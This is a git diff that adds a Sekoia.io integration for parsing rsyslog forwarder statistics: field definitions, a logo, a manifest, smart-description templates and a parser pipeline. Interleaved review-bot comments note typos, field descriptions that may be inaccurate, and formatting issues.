@@ -0,0 +1,95 @@
+sekoiaio.forwarder.module.type:
+ description: This identifies the module type for which the statistics are being reported
+ name: sekoiaio.forwarder.module.type
+ type: keyword
+
+sekoiaio.forwarder.module.name:
+ description: This identifies the module name for which the statistics are being reported
+ name: sekoiaio.forwarder.module.name
+ type: keyword
+
+sekoiaio.forwarder.intake.name:
+ description: Intake name defined in the forwarder
+ name: sekoiaio.forwarder.intake.name
+ type: keyword
+
+sekoiaio.forwarder.action.processed:
+ description: Number of messages processed by the action
+ name: sekoiaio.forwarder.action.processed
+ type: number
+
+sekoiaio.forwarder.action.failed:
+ description: Number of messages failed in the action
+ name: sekoiaio.forwarder.action.failed
+ type: number
+
+sekoiaio.forwarder.action.suspended:
+ description: Number of messages suspended by the action
+ name: sekoiaio.forwarder.action.suspended
+ type: number
+
+sekoiaio.forwarder.action.resumed:
+ description: Number of messages resumed by the action
+ name: sekoiaio.forwarder.action.resumed
+ type: number
+
+sekoiaio.forwarder.queue.size:
+ description: Number of messages in the queue
+ name: sekoiaio.forwarder.queue.size
+ type: number
+
+sekoiaio.forwarder.queue.enqueued:
+ description: Total number of messages enqueued into this queue since startup
+ name: sekoiaio.forwarder.queue.enqueued
+ type: number
+
+sekoiaio.forwarder.queue.full:
+ description: Number of times the queue was actually full and could not accept additional messages
+ name: sekoiaio.forwarder.queue.full
+ type: number
+
+sekoiaio.forwarder.queue.discarded.full:
+ description: Number of messages discarded because the queue was full
+ name: sekoiaio.forwarder.queue.discarded.full
+ type: number
+
+sekoiaio.forwarder.queue.discarded.nf:
+ description: Number of messages discarded because the queue was nearly full
+ name: sekoiaio.forwarder.queue.discarded.nf
+ type: number
+
+sekoiaio.forwarder.queue.maxqsize:
+ description: The maximum amount of messages that have passed through the queue since rsyslog was started
+ name: sekoiaio.forwarder.queue.maxqsize
+ type: number
+
+sekoiaio.forwarder.output.bytes.sent:
+ description: Number of bytes sent to Sekoia
+ name: sekoiaio.forwarder.output.bytes.sent
+ type: number
+
+sekoiaio.forwarder.input.submitted:
+ description: Number of messages handled by the forwarder input
+ name: sekoiaio.forwarder.input.submitted
+ type: number
+
+sekoiaio.forwarder.input.port:
+ description: Input port use by the forwarder
+ name: sekoiaio.forwarder.input.port
+ type: keyword
+
+sekoiaio.forwarder.stats.utime:
+ description: The amount of user CPU time consumed by rsyslog, in milliseconds.
+ name: sekoiaio.forwarder.stats.utime
+ type: number
+
+sekoiaio.forwarder.stats.stime:
+ description: The amount of system CPU time consumed by rsyslog, in milliseconds.
+ name: sekoiaio.forwarder.stats.stime
+ type: number
+
+sekoiaio.forwarder.stats.openfiles:
+ description: Number of file handles used by rsyslog
+ name: sekoiaio.forwarder.stats.openfiles
+ type: number
+
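Review bot: The description of `sekoiaio.forwarder.input.port` (`Input port use by the forwarder`) has a grammar slip and, more importantly, does not describe what the parser stores there: the value is the whole text between the parentheses of the module name (`20516` for imtcp, `*/20517/IPv4` for imudp in this patch's fixtures), so `description: Listener specification taken from the input module name (a bare port for imtcp, address/port/family for imudp)` would be accurate. The `stats.utime`/`stats.stime` descriptions say milliseconds; as far as I recall rsyslog's impstats resource-usage counters are reported in microseconds, so please confirm against the rsyslog documentation before the unit wording ships. `queue.maxqsize` is described as messages that "have passed through the queue since rsyslog was started", which is what `queue.enqueued` already counts; if maxqsize is the queue's high-water mark, the description should say so. PATCH 038 (`Fix lintier`) only reorders and re-wraps these entries, so the same descriptions reappear in its hunks.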
diff --git a/SekoiaIO/forwarder_log/_meta/logo.png b/SekoiaIO/forwarder_log/_meta/logo.png new file mode 100644 index 0000000000000000000000000000000000000000..84c1abac5b3bee4efc2f578e9d259feb1be60b31 GIT binary patch literal 14799 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%0A_fq_l{?XD*|L^sY&FPOd_XIBNyDGcHFXC+5^un| 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 HpT7EkUAMF@ literal 0 
HcmV?d00001
diff --git a/SekoiaIO/forwarder_log/_meta/manifest.yml b/SekoiaIO/forwarder_log/_meta/manifest.yml
new file mode 100644
index 000000000..cac923b14
--- /dev/null
+++ b/SekoiaIO/forwarder_log/_meta/manifest.yml
@@ -0,0 +1,9 @@
+uuid: 915a119c-2ec8-4482-a3c6-4d4cae62b671
+name: Sekoia.io forwarder logs
+slug: sekoiaio-forwarder-logs
+
+description: >-
+ Sekoia.io forwarder logs collect all statictics coming from Sekoia forwarder instances
+
+data_sources:
+ Process monitoring: "Sekoia forwarder logs are collected: rsyslog resource usage, queue size, number of messages handled, .."
\ No newline at end of file
diff --git a/SekoiaIO/forwarder_log/_meta/smart-descriptions.json b/SekoiaIO/forwarder_log/_meta/smart-descriptions.json
new file mode 100644
index 000000000..f973866e9
--- /dev/null
+++ b/SekoiaIO/forwarder_log/_meta/smart-descriptions.json
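Review bot: `statictics` in the manifest `description` is a typo in catalog-facing text: `Sekoia.io forwarder logs collect all statistics coming from Sekoia forwarder instances`. The file is also written without a trailing newline (`\ No newline at end of file`), as are smart-descriptions.json, parser.yml and every fixture under tests/ in this patch; ending each file with a newline keeps the next diff touching them clean.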
@@ -0,0 +1,63 @@
+[
+ {
+ "value": "{sekoiaio.forwarder.action.processed} messages processed with {sekoiaio.forwarder.action.failed} failed for intake {sekoiaio.forwarder.intake.name}",
+ "conditions": [
+ {
+ "field": "sekoiaio.forwarder.action.processed"
+ },
+ {
+ "field": "sekoiaio.forwarder.action.failed"
+ },
+ {
+ "field": "sekoiaio.forwarder.intake.name"
+ }
+ ]
+
+ },
+ {
+ "value": "{sekoiaio.forwarder.input.submitted} messages received on port {sekoiaio.forwarder.input.port} for intake {sekoiaio.forwarder.intake.name}",
+ "conditions": [
+ {
+ "field": "sekoiaio.forwarder.input.submitted"
+ },
+ {
+ "field": "sekoiaio.forwarder.input.port"
+ },
+ {
+ "field": "sekoiaio.forwarder.intake.name"
+ }
+ ]
+
+ },
+ {
+ "value": "Statistics for {sekoiaio.forwarder.module.name} queue: Current size: {sekoiaio.forwarder.queue.size}, Total enqueued: {sekoiaio.forwarder.queue.enqueued}",
+ "conditions": [
+ {
+ "field": "sekoiaio.forwarder.module.type",
+ "value": "core.queue"
+ },
+ {
+ "field": "sekoiaio.forwarder.module.name"
+ },
+ {
+ "field": "sekoiaio.forwarder.queue.size"
+ },
+ {
+ "field": "sekoiaio.forwarder.queue.enqueued"
+ }
+ ]
+
+ },
+ {
+ "value": "Forwarder stats received for module {sekoiaio.forwarder.module.type} named {sekoiaio.forwarder.module.name}",
+ "conditions": [
+ {
+ "field": "sekoiaio.forwarder.module.name"
+ },
+ {
+ "field": "sekoiaio.forwarder.module.type"
+ }
+ ]
+
+ }
+]
\ No newline at end of file
diff --git a/SekoiaIO/forwarder_log/ingest/parser.yml b/SekoiaIO/forwarder_log/ingest/parser.yml
new file mode 100644
index 000000000..ee671e5c7
--- /dev/null
+++ b/SekoiaIO/forwarder_log/ingest/parser.yml
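Review bot: The last entry's conditions (`sekoiaio.forwarder.module.name` and `sekoiaio.forwarder.module.type`) are a subset of the conditions of the three entries before it, so every event satisfies it; that works if the engine takes the first matching entry, but it is worth confirming, because otherwise the generic line can shadow the specific ones. Output (`omfwd`, `sekoiaio.forwarder.output.bytes.sent`) and resource-usage (`impstats`, `sekoiaio.forwarder.stats.*`) records only ever get that generic line; a dedicated entry for each, e.g. `"value": "{sekoiaio.forwarder.output.bytes.sent} bytes sent by {sekoiaio.forwarder.module.name}"` conditioned on `sekoiaio.forwarder.output.bytes.sent`, would make the two most operationally useful records readable at a glance. The stray blank line before each closing `}` is harmless but inconsistent with the rest of the file.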
@@ -0,0 +1,37 @@
+name: Sekoiaio Forwarder logs
+pipeline:
+ - name: json
+ external:
+ name: json.parse-json
+ properties:
+ input_field: "{{original.message}}"
+ output_field: event
+
+ - name: set_common_fields
+stages:
+ set_common_fields:
+ actions:
+ - set:
+ user.domain: "SEKOIA.IO"
+ sekoiaio.forwarder.intake.name: "{{ json.event.name.split('-', 1)[1].split('[')[0].split('(')[0]}}"
+ sekoiaio.forwarder.module.name: "{{json.event.name}}"
+ sekoiaio.forwarder.module.type: "{{json.event.origin}}"
+ sekoiaio.forwarder.action.processed: "{{json.event.processed}}"
+ sekoiaio.forwarder.action.failed: "{{json.event.failed}}"
+ sekoiaio.forwarder.action.suspended: "{{json.event.suspended}}"
+ sekoiaio.forwarder.action.resumed: "{{json.event.resumed}}"
+ sekoiaio.forwarder.queue.size: "{{json.event.size}}"
+ sekoiaio.forwarder.queue.enqueued: "{{json.event.enqueued}}"
+ sekoiaio.forwarder.queue.full: "{{json.event.full}}"
+ sekoiaio.forwarder.queue.discarded.full: "{{json.event.get('discarded.full')}}"
+ sekoiaio.forwarder.queue.discarded.nf: "{{json.event.get('discarded.nf')}}"
+ sekoiaio.forwarder.queue.maxqsize: "{{json.event.maxqsize}}"
+ sekoiaio.forwarder.output.bytes.sent: "{{json.event.get('bytes.sent')}}"
+ sekoiaio.forwarder.input.submitted: "{{json.event.submitted}}"
+ sekoiaio.forwarder.input.port: "{{ json.event.name.split('(')[1].split(')')[0] }}"
+ sekoiaio.forwarder.stats.utime: "{{json.event.utime}}"
+ sekoiaio.forwarder.stats.stime: "{{json.event.stime}}"
+ sekoiaio.forwarder.stats.openfiles: "{{json.event.openfiles}}"
+
+
+
\ No newline at end of file
diff --git a/SekoiaIO/forwarder_log/tests/action_log.json b/SekoiaIO/forwarder_log/tests/action_log.json
new file mode 100644
index 000000000..fe8e1aa28
--- /dev/null
+++ b/SekoiaIO/forwarder_log/tests/action_log.json
